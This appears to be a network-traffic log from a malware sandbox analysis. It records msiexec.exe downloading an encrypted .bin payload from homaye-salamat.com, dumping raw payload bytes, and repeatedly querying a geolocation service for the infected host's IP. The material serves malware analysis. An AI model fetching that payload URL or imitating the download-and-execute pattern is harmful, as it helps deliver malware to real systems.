                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 66 67 36 73 52 68 79 48 66 36 7a 6b 72 78 30 6c 54 67 37 48 56 42 79 48 66 36 78 4e 68 66 35 31 48 44 2b 71 4a 49 65 55 48 77 56 4b 42 6e 75 6b 51 38 7a 77 35 47 71 50 7a 6d 46 37 42 6e 73 61 4e 32 36 39 37 2f 76 77 57 44 46 37 63 78 30 68 73 34 4b 58 4a 59 77 30 45 4e 41 6b 68 63 59 49 65 67 5a 37 32 6e 57 43 30 75 69 46 2b 66 70 69 6e 6d 38 33 4f 30 4c 37 65 6c 54 78 73 37 36 6c 65 67 59 64 4c 58 49 2b 68 53 33 76 75 48 71 6b 65 72 79 32 35 36 48 62 48 5a 32 72 50 36 4d 6c 69 49 44 42 7a 73 46 67 51 6e 52 43 78 66 70 6d 62 66 69 61 70 2f 76 30 47 31 50 70 62 50 35 6d 2f 75 46 36 64 66 47 54 78 61 56 36 42 76 39 2b 48 49 38 7a 70 68 77 2f 6f 53 66 48 71 6e 75 6b 65 6a 74 30 49 44 46 4b 68 46 76 78 53 32 4d 65 56 5a 77 4c 2b 42 79 44 71 6b 77 34 4b 33 69
                                                                                Data Ascii: fg6sRhyHf6zkrx0lTg7HVByHf6xNhf51HD+qJIeUHwVKBnukQ8zw5GqPzmF7BnsaN2697/vwWDF7cx0hs4KXJYw0ENAkhcYIegZ72nWC0uiF+fpinm83O0L7elTxs76legYdLXI+hS3vuHqkery256HbHZ2rP6MliIDBzsFgQnRCxfpmbfiap/v0G1PpbP5m/uF6dfGTxaV6Bv9+HI8zphw/oSfHqnukejt0IDFKhFvxS2MeVZwL+ByDqkw4K3i
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 65 4c 61 75 38 6d 79 39 43 58 72 76 68 4e 63 79 77 33 46 66 47 62 36 73 65 51 71 72 42 63 4e 73 57 33 62 6f 6a 6a 6b 48 4b 71 41 6c 54 7a 6c 6b 53 2f 6e 37 45 4f 53 72 49 2f 4c 78 73 7a 36 6d 65 67 59 71 48 55 48 7a 41 6d 62 37 39 79 78 4b 68 36 62 36 54 54 44 62 61 2f 48 37 37 30 54 65 43 41 76 79 72 62 32 53 34 56 7a 66 43 6d 72 52 43 6e 69 62 53 48 57 56 77 41 67 49 7a 4f 4f 46 76 43 6d 6d 35 4f 38 62 51 64 6c 30 41 5a 64 52 4c 42 4c 34 4b 71 39 36 6d 47 37 48 2f 79 49 74 2f 34 70 36 70 48 71 2b 4e 57 54 48 39 53 6b 65 48 45 4b 4f 4b 76 76 45 52 54 70 41 45 2f 70 4f 34 30 6d 54 55 2f 76 30 33 39 77 39 71 76 4b 65 4f 53 54 79 35 71 49 44 42 53 54 5a 4a 64 4d 6f 6a 6a 38 77 38 47 59 6c 4e 6c 32 48 55 67 6c 34 6e 78 73 6c 49 63 6c 59 67 68 42 46 7a 65 57
                                                                                Data Ascii: eLau8my9CXrvhNcyw3FfGb6seQqrBcNsW3bojjkHKqAlTzlkS/n7EOSrI/Lxsz6megYqHUHzAmb79yxKh6b6TTDba/H770TeCAvyrb2S4VzfCmrRCnibSHWVwAgIzOOFvCmm5O8bQdl0AZdRLBL4Kq96mG7H/yIt/4p6pHq+NWTH9SkeHEKOKvvERTpAE/pO40mTU/v039w9qvKeOSTy5qIDBSTZJdMojj8w8GYlNl2HUgl4nxslIclYghBFzeW


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.951187185.10.75.234436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:31 UTC188OUTGET /finish/jQBlCBkXqDn162.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                Host: homaye-salamat.com
                                                                                Cache-Control: no-cache
                                                                                2025-03-12 18:16:31 UTC385INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                content-type: application/octet-stream
                                                                                last-modified: Tue, 11 Mar 2025 09:42:28 GMT
                                                                                accept-ranges: bytes
                                                                                content-length: 277568
                                                                                date: Wed, 12 Mar 2025 18:18:08 GMT
                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 61 25 f5 f8 c6 50 cf ab 8c 3f eb 89 79 7e ea 0f 15 c0 48 00 fd 9a 62 a6 a6 39 e6 88 07 d3 a7 8c 8d f0 d0 1e 32 f8 a1 29 10 26 7b cc f8 39 84 b7 ba 75 72 97 a8 52 2d 24 1d 12 fb 1d 11 8f a2 24 00 8f a1 ab aa f5 38 12 cb e8 34 35 28 92 a9 0c e1 50 87 01 37 ca 42 36 0c 54 d2 5b 20 62 96 ee 53 fb 7d eb bc 29 40 5d 99 aa 45 08 61 5c c2 b0 4e a0 e6 3e 0f 7f 5b 2b d1 9f 3c fb 1b 5d ac b9 e5 c6 eb 8b ef 73 43 54 3c 03 d7 05 d3 47 1a e0 97 8e cb 20 ad 51 27 89 93 ed de a4 e5 6c 1a bf 58 17 43 01 6a f7 0d 23 77 8d 1c 0a e1 46 86 69 f4 9d 2e 79 e8 32 84 3a 47 32 84 7a e3 62 1d d2 e2 d9 4d a5 4d 00 53 c7 79 c4 6d 8b 92 20 9c 46 96 9d 0a 3f 10 09 24 ce 8a d4 af fb 87 d7 d6 cb 09 17 12 ef e7 d6 63 54 d7 50 ec 08 ba e9 d8 ff bc 33 27 5a 4a 81 51 8e 58 83 35 b8 e2 33 f2
                                                                                Data Ascii: a%P?y~Hb92)&{9urR-$$845(P7B6T[ bS})@]Ea\N>[+<]sCT<G Q'lXCj#wFi.y2:G2zbMMSym F?$cTP3'ZJQX53
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 77 9b b1 c4 c9 8b e2 52 dc e0 ec 67 bf d5 17 86 63 9e d2 cc 4f 2f ff e2 62 0d 12 cf 32 6c 50 2b 3b 4d da c2 57 7c 5b f1 43 a4 81 38 c4 30 8c 06 9f 40 6c c1 ae 5a 67 63 25 f8 28 e7 fa 7e 15 18 4e 0c 0f 6b 05 ca fc 80 f5 79 f0 5b 41 2b 1c 10 18 09 87 2b 47 2e 50 fc 65 2d 7d c7 dc 79 f1 e9 40 6b e4 b6 0f ea 50 7f e2 5a 5a 13 2b 2b 8b 8a 9d a1 08 41 99 92 76 82 35 80 bf b7 28 d2 39 10 9c 5c a3 2f 82 aa 10 ae 17 51 92 d5 3c 92 a8 9c 6e 9c 87 52 a5 1c 56 4d a0 f9 7c 13 88 03 fe 97 75 69 70 b3 ef 64 7c ca d7 e0 a0 b4 da 51 6c 60 b7 66 08 58 59 da f8 6e cd d4 5f 6b b2 eb d2 87 61 8c b5 66 92 77 34 97 a3 d1 3e 74 4a ae 40 58 ad 31 62 42 7b 07 e5 b2 a2 a3 e4 0c 87 03 f0 f7 48 a8 b4 98 dc e3 68 98 85 57 12 b9 1c 43 1a 2b d6 1f e0 15 d0 1d 15 7d 81 a0 ff 6c 9e 3a 87
                                                                                Data Ascii: wRgcO/b2lP+;MW|[C80@lZgc%(~Nky[A++G.Pe-}y@kPZZ++Av5(9\/Q<nRVM|uipd|Ql`fXYn_kafw4>tJ@X1bB{HhWC+}l:
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: f1 d8 d8 10 12 0b fe ff c0 72 4c a7 7d 87 56 ba c9 d2 ff ad 4a 4c fc 4a 81 1b 8e 49 b4 5a 6d e2 31 f8 a6 ce f8 18 98 ac c1 ed c7 1b da 0c c8 6c b6 d7 5a d3 44 79 5a f0 98 68 99 58 ae e4 94 f6 e7 17 d7 38 f7 eb c0 a6 c3 e3 c2 75 ab 1c b8 4f dd ad bd 50 1c 1d f8 cb 19 3a cc c6 60 ab ea 55 aa d9 c7 0e b0 d3 b4 ae 4d 8c 0c 0e b3 54 4c 7b 51 3c d8 5e 22 f0 ad 36 21 7c 38 81 74 e5 09 24 93 df 59 12 6a 99 cc 1d 7f cb e7 f6 de c6 d6 c5 c8 86 22 d9 e1 25 2d cb 96 1f c0 e2 49 69 b7 23 13 aa eb 42 ae 34 cd 19 8b c0 65 3c 14 33 ec 90 6c 22 31 15 3e e3 ee e6 d1 81 d9 78 c3 3f 1e 7b f6 25 f1 fc dc db da 87 15 4f f2 9e 09 98 41 8b fc f3 68 b4 d8 8f 6e 30 bc a3 07 71 b2 b3 39 e8 8c 3f 82 fa 0d 28 c0 a7 7d b3 a0 c6 1c 55 5f 69 01 db 12 04 a3 24 00 db aa c4 8d d8 24 a1 13
                                                                                Data Ascii: rL}VJLJIZm1lZDyZhX8uOP:`UMTL{Q<^"6!|8t$Yj"%-Ii#B4e<3l"1>x?{%OAhn0q9?(}U_i$$
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 89 e1 eb 3a 5f b2 96 ac 69 22 ef 85 5d c6 d6 df 69 1a 21 d6 20 c0 15 d0 19 66 b9 81 b3 f5 7f 96 24 b7 2c 2b 7a 6a 34 41 59 ba 37 c8 53 a9 de 62 2f 05 c2 0f 62 ad f6 80 b4 8c 68 f6 e3 13 ce 85 93 2b 0b 5f 5c 42 47 fb f9 18 d1 76 3f 46 71 57 21 2c 50 17 d8 b7 46 24 60 91 0d 06 fc 0e 76 c8 31 bb 19 a2 72 e3 95 ce ee ee 73 41 9a c9 c1 75 c1 2d 89 0a 10 0c 0c dc d6 92 69 59 70 95 7a 82 c8 e9 79 f4 92 81 a8 c6 ba 83 6b ff b9 98 f0 dc 77 ae 0b f9 44 fe 83 08 84 95 f3 f0 32 6b 28 72 6e 69 2a 42 aa 8c 70 6f cc ed d9 41 3a f8 41 06 1b 60 3d da 8e 88 2b f6 3b 41 70 97 43 fa 73 ba dc 0b e7 f4 f7 94 4f 32 14 4b ba b4 94 78 24 99 b1 77 92 d4 da 95 36 a5 0c d7 2b 5e 45 9f 0f 66 b6 ce fa 77 1f 14 21 8f 87 cf a1 3b b4 16 79 ea 27 d0 33 f4 cb 7c 2c fc f7 7f 6e 7a 5c 68 08
                                                                                Data Ascii: :_i"]i! f$,+zj4AY7Sb/bh+_\BGv?FqW!,PF$`v1rsAu-iYpzykwD2k(rni*BpoA:A`=+;ApCsO2Kx$w6+^Efw!;y'3|,nz\h
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: b0 8a c9 ef c1 83 e3 14 24 b8 c8 9f b2 c3 b3 12 5e 73 7b 01 62 12 04 a3 47 79 a6 f6 b4 a5 91 35 a8 3d ce 19 4d d7 14 af 15 1d 13 f1 dc 3b d0 ce 0b d5 df aa a8 0b d7 1e 7e 34 6f 8e 1e be 8b 60 fd c1 48 c9 f2 3f 93 10 b9 1a df cc e1 51 ea de ee 62 1d a4 3f 0c 15 6f 91 bb 35 9b 9d ee 3f 57 27 8c 6f d0 a0 e2 b8 b6 79 78 be 82 9e ac 0a 90 d2 76 e5 be 69 35 04 78 fa 2c 41 e9 50 e1 8b 84 e5 be 22 22 d2 64 5d fd 0b f0 02 12 6f 2b a9 67 9e e1 73 60 45 03 7d fe 7d f5 22 38 cc 23 a4 2f 0e 8c 1f 83 aa 0f a2 00 da 5e 18 29 1b f4 47 69 ff f3 56 e0 f5 4a 20 89 93 6b 85 86 e4 1e da 99 f1 fa df 65 5a 37 c3 db 0c b4 1b aa 17 a7 8e 49 c6 03 d7 9d f7 b4 b0 87 6e 22 9e ac 07 9b e8 42 71 2c d6 0c 65 d1 79 18 a9 70 d3 7b 19 8c 98 78 97 4f 7d 6e 56 89 5a 87 16 5f e8 65 14 b1 63
                                                                                Data Ascii: $^s{bGy5=M;~4o`H?Qb?o5?W'oyxvi5x,AP""d]o+gs`E}}"8#/^)GiVJ keZ7In"Bq,eyp{xO}nVZ_ec
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: a6 7d 5a 8c c6 f8 7c 8c 14 51 e6 87 81 a1 3d 98 36 03 c1 25 d6 26 ef 00 63 3d 14 e7 6a 5b e1 51 44 1e 92 4d 33 50 e8 2f 69 60 e0 97 14 71 c7 4f 7d 44 86 56 02 79 68 b1 5b c9 66 28 9b 40 96 26 8f d3 dc f0 6f ee dd 55 e9 ce be f8 16 c3 1b 13 93 f8 ad 9d 38 93 71 a0 9e ba 84 65 7b 5c e9 4c 19 cd 10 cb a7 14 9e d3 3a 90 77 a7 12 27 ab 38 9e 97 cd de a8 9e a2 10 3e a5 ee a0 f3 c0 ab 97 e6 cb 4e 6a 52 19 86 58 c6 17 85 c4 49 06 1d c7 77 14 da b2 6c c6 8c b5 13 93 25 18 25 9e e8 cf 22 ab d9 d2 f5 6c 98 ac aa f4 67 93 34 59 94 77 be 17 18 40 4b 47 17 6f 0a ed bb 44 5a 9b 25 6a f7 f7 14 fe 28 7b 13 05 e2 de c6 ef 9d af a9 b8 5e 9c 03 90 3a 58 51 c8 4e 67 01 b2 6b 1f 67 84 f9 a2 c1 23 d2 bd f9 28 2d 55 55 d0 12 d0 4f 90 43 a8 5a 3f c8 03 ca d8 73 1b 94 0f b5 eb 54
                                                                                Data Ascii: }Z|Q=6%&c=j[QDM3P/i`qO}DVyh[f(@&oU8qe{\L:w'8>NjRXIwl%%"lg4Yw@KGoDZ%j({^:XQNgkg#(-UUOCZ?sT
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 24 3e af 8f 2c dc d9 72 cd 17 2d a9 70 df 1b 3a 8e b0 1c 9b 47 05 80 d1 89 00 e8 7f 41 e8 63 32 b9 0c dd 6c 1e 6c 98 09 a9 2f fb 88 49 0d bb 65 9f c4 46 90 89 f2 60 d2 45 8d 3a d5 60 0e c2 78 7c 46 6b 57 8b a4 47 ea ca 41 a7 71 2f 7f b6 45 1b da 90 9b 3f 69 54 86 f8 3f 1e 34 71 f8 14 78 cd 82 9f b7 9e ab 9b 19 ec 10 5a f0 33 68 0c 86 50 38 6f 06 25 72 e3 2d ca c1 2b 05 28 94 88 5e 32 39 6d 83 81 22 0b 75 70 3f 07 5c a9 8f fc 70 53 3c 25 f2 56 8c 29 d0 e5 ce ad 44 5d 59 9d 3f 24 85 00 a2 61 e3 71 84 3f aa a6 b9 85 20 f7 7f 40 2d 83 44 e2 19 83 9c d0 58 0e 0b 18 01 6e 3d de 56 7b 97 be e0 39 9a 76 98 0f d3 f8 73 92 d5 ed b5 bc f1 c5 f1 16 e1 c9 03 1b 10 78 67 5a c2 ca 90 7c 47 17 85 8e f6 e1 53 b5 4d 67 00 fc 5e a1 f8 93 70 f8 53 68 a5 4e bd 69 3e de c6 e4
                                                                                Data Ascii: $>,r-p:GAc2ll/IeF`E:`x|FkWGAq/E?iT?4qxZ3hP8o%r-+(^29m"up?\pS<%V)D]Y?$aq? @-DXn=V{9vsxgZ|GSMg^pShNi>
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 1b 63 84 1c b1 cb 23 c1 df f9 39 27 94 49 f8 36 d0 5f 9a 31 72 04 2c b8 dc 89 d9 63 57 9e 0f b2 d8 76 94 cd f7 75 c4 c3 3b 7d fd f4 69 69 af 94 0f 63 45 34 25 87 d4 3c 59 73 52 f8 ce ba af b9 fb 69 d1 71 9d 2d 6e c5 5b c8 e2 3f c1 6e 2f 9a 45 4a 05 0c 46 89 38 ea 34 e1 40 48 be 9f 73 ec 97 a1 59 78 61 18 6b 41 13 3b 80 16 92 22 eb 0c 6f af 42 59 ce 95 2e 7a d7 62 2e 65 73 ec 76 69 b6 0d 72 80 d5 bc 66 d3 7f 58 fa 6e f7 0e be 6d a4 76 67 7d 79 31 db c6 de 3a 12 c9 fb 31 3c a5 37 a8 0c 29 46 af b4 37 ca 48 20 b2 57 c3 5f 52 38 97 ee 23 ed 55 5e bc 29 4a 4b 67 a9 1a 19 64 2e 98 b1 4e d0 f0 16 ba 7f 5b 21 c7 61 3f a4 88 55 bd b1 c7 94 4c 08 ae c7 4a 98 38 ad a4 8e b0 66 3e 2a db ea e2 f2 fa 26 32 38 5e 80 8e 65 a1 1b 65 d4 8e 12 3b 16 97 29 78 3d f5 c1 69 3b
                                                                                Data Ascii: c#9'I6_1r,cWvu;}iicE4%<YsRiq-n[?n/EJF84@HsYxakA;"oBY.zb.esvirfXnmvg}y1:1<7)F7H W_R8#U^)JKgd.N[!a?ULJ8f>*&28^ee;)x=i;
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: 16 a4 14 b8 ba 55 0e 67 93 ac 49 e1 55 97 49 98 03 a9 46 aa d0 26 5c b5 4e e3 97 63 bf 68 1d c4 bc 8c 38 76 73 78 c3 5b a3 1d 58 f8 2c a1 8c 33 8a 6f 79 c1 2e 7e 54 bd 40 43 b0 d0 a6 f2 03 78 39 0a 43 81 61 17 eb bb d2 84 28 cc 87 16 8d 5c 3a 38 78 33 f4 9a cc da 89 f1 7e b7 92 b6 6c 62 ca 07 ae d6 9e d2 c6 27 e3 fc f3 62 0d dd cc 32 6c 50 2b 3b 4d da c2 57 7c 59 bd 55 b2 95 06 3e 72 97 8b a0 6f 6c c0 8f 3e 3c 94 99 88 4e 6d 6a 69 1c b0 7d ea 7c bb af db 8a 1b e6 61 e1 5f e3 1a f8 64 11 2e 87 5d 96 65 27 fc 6f 0f 0a cf a2 51 f1 9a f9 7a ec 94 55 ed 41 72 1c 42 5a 13 2b 58 35 9b 9b bc b1 ed 9f 83 7a 93 21 b9 bd 88 d7 2d 33 6e 7f 4c 86 03 d9 6b 10 a4 0e 58 83 fa 2c dd b8 96 c0 b4 37 78 a5 17 34 28 b0 f9 0c 28 d3 c9 23 9d 0a ed 70 b3 e4 7f 5d c9 ca 82 e1 b4
                                                                                Data Ascii: UgIUIF&\Nch8vsx[X,3oy.~T@Cx9Ca(\:8x3~lb'b2lP+;MW|YU>rol><Nmji}|a_d.]e'oQzUArBZ+X5z!-3nLkX,7x4((#p]
                                                                                2025-03-12 18:16:32 UTC16384INData Raw: fd 4b 1e 60 5d 8c f7 8f b1 51 df 4e 56 d3 47 80 fe cd 92 fc 77 c1 29 45 7b 65 4a f5 6e 65 e2 e4 72 20 b3 f7 d6 16 88 f6 38 46 c7 3f f9 26 4b 87 84 7a e9 74 e3 d1 ed 8f 45 b4 09 2d 1d da 9c 3f e3 ec 93 05 8a 34 a1 57 0a 4f 52 2c 31 c6 23 f0 e7 89 5a 5d d2 bb ab 26 0b fe e3 74 46 4e 5b d5 33 08 ca 6b fd e4 ad 56 81 7f 56 f3 25 a9 58 d3 97 90 95 31 f2 bf c7 e0 7c d6 d7 c1 e9 dc 01 eb 54 d1 1f 19 57 7b d9 57 66 4b eb e6 12 8e 8e b7 f0 99 e0 ed 7e 4e 78 08 1e 3f b7 da 52 74 50 83 22 b8 5e cd d1 61 50 34 75 f8 cb 2b 27 cc c6 4a aa fa 43 82 a1 c7 1d ba 24 9e af 51 ca 0c 26 cb 4f 7c 75 51 3c 54 1f 22 a4 ac 13 26 0e b3 96 5c 9b 20 66 99 ad 98 6a 4f fe 9a 11 7f cb e9 5e fb d8 8c 76 d8 86 58 fa a7 1c cb cd 34 3a df ef 22 6b b7 21 bd 87 83 af b8 25 bd 06 01 e7 7e 21
                                                                                Data Ascii: K`]QNVGw)E{eJner 8F?&KztE-?4WOR,1#Z]&tFN[3kVV%X1|TW{WfK~Nx?RtP"^aP4u+'JC$Q&O|uQ<T"&\ fjO^vX4:"k!%~!


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.951189104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:16:37 UTC859INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:37 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211870
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uNEZ7cYnAlSwv1n9hufPf5%2Bg5%2BZKYHabFvDqVvbZvmM8%2BWER6ft%2FHohP8t7AIIUwmc75zIgtDlCEd0pMLX7HFoXgUizOPA1xMWODETyCF79YdsQuVFvxwvGnU1gsOSdv326EPin"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f548a24a96e81c-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=26407&min_rtt=26105&rtt_var=10393&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=101535&cwnd=219&unsent_bytes=0&cid=23ca1d2d0c4bde75&ts=885&x=0"
                                                                                2025-03-12 18:16:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.951190104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2025-03-12 18:16:40 UTC858INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:40 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211872
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FbK%2BY4xEumIMzj5yIDqqsczjcY39T8NXlqifYHzBASR6Sa%2FAMdvT9moG82Jj88Y4eqkzztzvQvunMZiNvo1gQXGjTQkqQffPd6uK%2FO53G%2FR4JoKpA47J7QQrIC8Q9BOZihLjeCzM"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f548b2aaad2261-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=21652&min_rtt=18804&rtt_var=12749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=69623&cwnd=238&unsent_bytes=0&cid=4b03cf0ac127f775&ts=559&x=0"
                                                                                2025-03-12 18:16:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.951192104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:16:43 UTC865INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:43 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211876
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hRHf%2BDbQ%2BnslPDtpvUpIArwjtiyIONiTgf6HDtlfXDHBFrm8dbtBxGl5n%2FvOs9ci%2B8KfP%2BkGbRATLphQ4Cj5FZfBc2HZV%2FqXqEoggS1SvJsq821M2DsslxvegwD7pzd9FxQI8ixp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f548c8692ee810-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=554576&min_rtt=110926&rtt_var=315166&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=26107&cwnd=236&unsent_bytes=0&cid=37439ece355769d8&ts=603&x=0"
                                                                                2025-03-12 18:16:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.951194104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2025-03-12 18:16:46 UTC856INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:46 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211879
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
